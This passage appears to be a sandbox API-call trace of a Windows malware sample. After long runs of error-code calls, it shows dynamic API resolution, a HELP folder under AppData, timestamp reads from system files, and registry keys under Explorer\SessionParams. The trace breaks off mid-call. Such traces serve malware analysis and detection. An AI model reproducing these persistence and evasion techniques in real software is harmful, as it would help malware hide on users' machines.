(dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.591] SetLastError (dwErrCode=0x0) [0030.591] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.592] SetLastError (dwErrCode=0x0) [0030.592] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.593] SetLastError (dwErrCode=0x0) [0030.593] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.594] SetLastError (dwErrCode=0x0) [0030.594] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.595] SetLastError (dwErrCode=0x0) [0030.595] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.596] SetLastError (dwErrCode=0x0) [0030.596] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.597] SetLastError (dwErrCode=0x0) [0030.597] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.598] SetLastError (dwErrCode=0x0) [0030.598] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.599] GetLastError () returned 0x0 [0030.599] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.600] SetLastError (dwErrCode=0x0) [0030.600] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.601] SetLastError (dwErrCode=0x0) [0030.601] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.602] GetLastError () returned 0x0 [0030.602] SetLastError (dwErrCode=0x0) [0030.603] GetLastError () returned 0x0 [0030.603] SetLastError (dwErrCode=0x0) [0030.603] GetLastError () returned 0x0 [0030.603] SetLastError (dwErrCode=0x0) [0030.603] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0030.604] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0030.604] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0030.605] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf8b8 | out: lpSystemTimeAsFileTime=0x1cf8b8*(dwLowDateTime=0xe01286d0, dwHighDateTime=0x1d3dfba)) [0030.605] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.605] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf6d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.605] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetLastError () returned 0x0 [0030.606] GetSystemDirectoryA (in: lpBuffer=0x72e0e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.607] wsprintfA (in: param_1=0x72e0e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0030.607] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.607] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.607] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.607] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.607] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0030.607] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0030.607] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0030.607] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0030.607] GetLastError () returned 0xb7 [0030.607] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72e0e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0030.607] wsprintfA (in: param_1=0x72e0e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0030.607] wsprintfA (in: param_1=0x72e0e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0030.608] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72e0e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0030.608] wsprintfA (in: param_1=0x1cf558, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.608] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0030.608] wsprintfA (in: param_1=0x1cf454, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0030.608] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.608] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e0ec68, lpLastAccessTime=0x72e0ec70, lpLastWriteTime=0x72e0ec78 | out: lpCreationTime=0x72e0ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72e0ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72e0ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0030.608] CloseHandle (hObject=0x74) returned 1 [0030.608] GetLastError () returned 0x0 [0030.608] wsprintfA (in: param_1=0x72e0ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0030.608] GetLastError () returned 0x0 [0030.608] wsprintfA (in: param_1=0x72e0eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0030.609] GetSystemDirectoryA (in: lpBuffer=0x1cf558, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0030.609] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0030.609] GetFileTime (in: hFile=0x74, lpCreationTime=0x72e1012c, lpLastAccessTime=0x72e10134, lpLastWriteTime=0x72e1013c | out: lpCreationTime=0x72e1012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72e10134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72e1013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0030.609] CloseHandle (hObject=0x74) returned 1 [0030.609] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.609] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.609] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0030.611] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0030.611] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0030.611] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0030.611] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0030.611] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0030.611] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0030.611] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0030.611] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0030.611] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0030.612] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0030.613] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0030.614] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0030.614] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0030.614] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0030.614] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0030.614] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0030.614] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0030.614] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0030.614] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0030.614] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0030.615] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0030.615] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0030.615] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0030.615] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0030.615] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.615] GetModuleFileNameW (in: hModule=0x72dd0000, lpFilename=0x72e0e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.615] GetModuleFileNameA (in: hModule=0x72dd0000, lpFilename=0x72e0e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0030.615] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0030.621] AddAtomT () returned 0x0 [0030.621] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1cfa8c, lpdwDisposition=0x1cfa90 | out: phkResult=0x1cfa8c*=0x78, lpdwDisposition=0x1cfa90*=0x1) returned 0x0 [0030.622] CloseHandle (hObject=0x78) returned 1 [0030.622] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0030.622] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1cfad8, lpdwDisposition=0x1cfb90 | out: phkResult=0x1cfad8*=0x7c, lpdwDisposition=0x1cfb90*=0x1) returned 0x0 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0ed94, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0ed94*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0ed98, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0ed98*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0ed9c, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0ed9c*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eda4, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eda4*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0eda8, lpcbData=0x1cfad4*=0x4 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0eda8*=0x0, lpcbData=0x1cfad4*=0x4) returned 0x2 [0030.623] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x1cfadc, lpData=0x72e0edb8, lpcbData=0x1cfad4*=0x8 | out: lpType=0x1cfadc*=0x0, lpData=0x72e0edb8*=0x0, 